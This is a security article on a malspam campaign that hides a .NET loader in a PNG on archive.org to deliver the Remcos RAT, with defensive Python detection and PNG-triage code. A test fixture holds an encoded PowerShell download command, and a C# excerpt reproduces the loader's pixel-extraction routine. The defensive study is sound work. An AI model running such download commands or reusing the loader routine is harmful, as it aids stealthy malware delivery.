Security researchers have uncovered a novel malware delivery chain in recent weeks that leverages the Internet Archive’s legitimate infrastructure to host obfuscated payloads.
The attack begins with a seemingly innocuous JScript file delivered via malspam, which in turn invokes a PowerShell loader.
This PowerShell script reaches out to the Internet Archive (archive.org) to retrieve a benign-looking PNG image that, upon closer inspection, houses a hidden .NET loader encoded within its pixel data.
Researchers noted that this clever repurposing of a trusted web property allowed the attackers to blend malicious traffic seamlessly with legitimate archival requests, complicating detection efforts.
VMRay analysts identified the initial JScript loader as the first stage, executed when a victim opens a malicious attachment. The script instantiates a WScript.Shell object and executes PowerShell with a Base64-encoded command string.
When decoded, the command connects to a URL under archive.org, downloads image.png, and passes it to an in-memory .NET assembly extractor.
The extraction routine reads each pixel’s RGB values and reconstructs the original DLL byte stream.
In a matter of seconds, the .NET loader establishes persistence by creating a registry Run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
It then decompresses and launches the final payload: a Remcos remote access trojan. The Remcos instance connects to its command-and-control (C2) server via a Duck DNS subdomain, ensuring dynamic resolution and redundancy.
Subsequent beaconing and module loading occur entirely in memory, leaving minimal forensic artifacts on disk. This memory-only execution chain highlights the adversary’s emphasis on evading traditional signature-based detection tools.
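The chain described above leaves three host-level signals even though the payload itself never touches disk: a script host (wscript.exe) spawning PowerShell, an -EncodedCommand argument that decodes to an archive.org image download, and a value written under the HKCU Run key. The following detection logic is an added example, not code from the page or from VMRay. It runs over constructed Sysmon-style events (field names follow Sysmon's process-create and registry-set events; the file names, the "Updater" value name and the archive.org item path are placeholders I made up; the page names only the archive.org host and image.png).

```python
import base64
import re

# Constructed Sysmon-style events, not telemetry from the campaign. Event 1 mirrors the first
# stage (wscript.exe launching PowerShell with an encoded command that fetches a PNG from
# archive.org); event 13 mirrors the persistence step (a value written under the HKCU Run key).
# The archive.org item path and all file names are placeholders.

def _encoded_command(script):
    """Build a -EncodedCommand argument: Base64 of the UTF-16LE script text, as PowerShell expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"EventID": 1,
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand " + _encoded_command(
         "$b=(New-Object Net.WebClient).DownloadData('https://archive.org/download/PLACEHOLDER-ITEM/image.png')")},
    {"EventID": 13,
     "Image": r"C:\Users\victim\AppData\Roaming\loader.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\victim\AppData\Roaming\loader.exe"},
    {"EventID": 1,  # benign control event: explorer launching notepad
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# -e, -ec, -enc and -encodedcommand are all accepted spellings of the switch
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
ARCHIVE_PNG_RE = re.compile(r"archive\.org/\S*\.png", re.I)

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid Base64/UTF-16LE: leave it to other rules

def triage_event(ev):
    """Return the list of findings for one event (empty for benign events)."""
    findings = []
    if ev.get("EventID") == 1:
        if _basename(ev.get("ParentImage", "")) in SCRIPT_HOSTS and _basename(ev.get("Image", "")) in POWERSHELL:
            findings.append("script-host-spawned-powershell")
        decoded = decode_encoded_command(ev.get("CommandLine", ""))
        if decoded is not None:
            findings.append("encoded-powershell-command")
            if ARCHIVE_PNG_RE.search(decoded):
                findings.append("archive-org-image-fetch")
    elif ev.get("EventID") == 13 and RUN_KEY_RE.search(ev.get("TargetObject", "")):
        findings.append("run-key-persistence")
    return findings

def triage(events):
    """Map event index -> findings for every event that triggered at least one rule."""
    hits = {}
    for i, ev in enumerate(events):
        f = triage_event(ev)
        if f:
            hits[i] = f
    return hits

if __name__ == "__main__":
    for i, f in triage(SAMPLE_EVENTS).items():
        print(i, f)
```

Decoding the encoded command before matching is the point: a rule that only looks at the raw command line sees an opaque Base64 blob and never learns that the request goes to archive.org, which is exactly why the campaign pairs the trusted host with the encoding. The proxy log will show only the TLS session to archive.org, so the endpoint is where the image fetch becomes visible.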
The implications of abusing a high-reputation archive for malware hosting are profound. By embedding malicious code within an innocuous image on archive.org, attackers exploit the archive’s HTTPS certificates and content delivery network to avoid raising red flags.
Network defenders may see only an encrypted HTTPS request to archive.org, which is typically whitelisted, thereby bypassing firewall and proxy inspection.
The obfuscation layers—JScript, Base64, RGB pixel encoding, in-memory .NET execution—compound the stealth of the campaign.
```csharp
using System.Collections.Generic;
using System.Drawing;

// Reconstructs the embedded DLL from the image: every non-black pixel contributes
// its R, G and B bytes, in row-major order, to the compressed byte stream.
public byte[] ExtractPayload(Bitmap bmp) {
    List<byte> bytes = new List<byte>();
    for (int y = 0; y < bmp.Height; y++) {
        for (int x = 0; x < bmp.Width; x++) {
            Color pixel = bmp.GetPixel(x, y);
            // Pure-black pixels are treated as padding and skipped
            if (!(pixel.R == 0 && pixel.G == 0 && pixel.B == 0)) {
                bytes.Add(pixel.R);
                bytes.Add(pixel.G);
                bytes.Add(pixel.B);
            }
        }
    }
    // Decompress is the loader's own routine and is not part of the excerpt
    return Decompress(bytes.ToArray());
}
```

The infection mechanism, from JScript invocation through in-memory payload deployment, reveals how each stage subverts common defensive controls.
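An analyst who finds a suspicious PNG can apply the same reconstruction the loader does and ask whether the result looks like an executable. The script below is an added example, not code from the page, from VMRay or from the malware: it reads an 8-bit RGB/RGBA PNG with only the standard library, rebuilds the byte stream exactly as ExtractPayload does (RGB of every non-black pixel, row-major), and classifies the stream as a raw PE, a zlib/gzip wrapper around one, or nothing recognisable. The PNG reader, the PE check and the fixture builder are mine; FAKE_PE is a constructed stub that is not a sample from the campaign.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def _paeth(a, b, c):
    # PNG Paeth predictor (filter type 4)
    p = a + b - c
    pa, pb, pc = abs(p - a), abs(p - b), abs(p - c)
    if pa <= pb and pa <= pc:
        return a
    return b if pb <= pc else c

def decode_png_rgb(data):
    """Minimal PNG reader for 8-bit RGB/RGBA, non-interlaced images (CRCs not verified).
    Returns (width, height, channels, rows); each row holds the unfiltered samples."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG file")
    pos, idat, header = 8, bytearray(), None
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC
        if ctype == b"IHDR":
            w, h, depth, color, _, _, interlace = struct.unpack(">IIBBBBB", body)
            if depth != 8 or color not in (2, 6) or interlace != 0:
                raise ValueError("unsupported PNG layout")
            header = (w, h, 3 if color == 2 else 4)
        elif ctype == b"IDAT":
            idat += body
        elif ctype == b"IEND":
            break
    if header is None:
        raise ValueError("missing IHDR")
    w, h, ch = header
    raw, stride = zlib.decompress(bytes(idat)), w * ch
    prev, rows = bytearray(stride), []
    for y in range(h):
        off = y * (stride + 1)
        ftype, cur = raw[off], bytearray(raw[off + 1:off + 1 + stride])
        for i in range(stride):  # undo the per-row filter in place
            a = cur[i - ch] if i >= ch else 0
            b = prev[i]
            c = prev[i - ch] if i >= ch else 0
            if ftype == 1: cur[i] = (cur[i] + a) & 0xFF
            elif ftype == 2: cur[i] = (cur[i] + b) & 0xFF
            elif ftype == 3: cur[i] = (cur[i] + ((a + b) >> 1)) & 0xFF
            elif ftype == 4: cur[i] = (cur[i] + _paeth(a, b, c)) & 0xFF
        rows.append(bytes(cur))
        prev = cur
    return w, h, ch, rows

def extract_rgb_stream(data):
    """Rebuild the stream the way ExtractPayload does: R, G, B of every non-black pixel, row-major.
    Consequence of that scheme: an aligned run of three zero bytes in the hidden payload is dropped."""
    w, _, ch, rows = decode_png_rgb(data)
    out = bytearray()
    for row in rows:
        for x in range(w):
            rgb = row[x * ch:x * ch + 3]
            if rgb != b"\x00\x00\x00":
                out += rgb
    return bytes(out)

def looks_like_pe(stream):
    # MZ header plus the PE signature at e_lfanew: cheap, but far stronger than "MZ" alone
    if not stream.startswith(b"MZ") or len(stream) < 0x40:
        return False
    e_lfanew = struct.unpack_from("<I", stream, 0x3C)[0]
    return stream[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def classify_stream(stream):
    """Label a reconstructed stream: raw PE, compressed wrapper around one, or None."""
    if looks_like_pe(stream):
        return "pe-executable"
    for magic, wbits in ((b"\x1f\x8b", 16 + zlib.MAX_WBITS), (b"\x78", zlib.MAX_WBITS)):
        if stream.startswith(magic):
            try:
                inner = zlib.decompress(stream, wbits)
            except zlib.error:
                return "compressed-corrupt"
            return "compressed-pe" if looks_like_pe(inner) else "compressed-other"
    return None

def triage_png(data):
    return classify_stream(extract_rgb_stream(data))

# Constructed test fixture (not a sample from the campaign): pack bytes into RGB triplets
def _chunk(ctype, body):
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def build_fixture_png(payload, width):
    pixels = payload + b"\x00" * (-len(payload) % 3)
    height = -(-(len(pixels) // 3) // width)
    pixels += b"\x00" * (width * height * 3 - len(pixels))  # black padding pixels
    raw = b"".join(b"\x00" + pixels[y * width * 3:(y + 1) * width * 3] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")

# PE-shaped stub: MZ, e_lfanew -> 0x40, "PE\0\0" there; laid out so no RGB triplet is all-zero
FAKE_PE = b"MZ" + b"\x90" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"A" * 25
COMPRESSED_FAKE_PE = zlib.compress(FAKE_PE)
```

Treat the label as a triage signal rather than a verdict: a genuine photograph whose first non-black pixel happens to start with 0x78 will be reported as corrupt compressed data, and a loader that skips pixels or uses a different channel order will defeat a byte-exact rebuild. What survives either case is the cheap check that the reconstructed stream of a supposed image should not decompress into something with a PE header.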
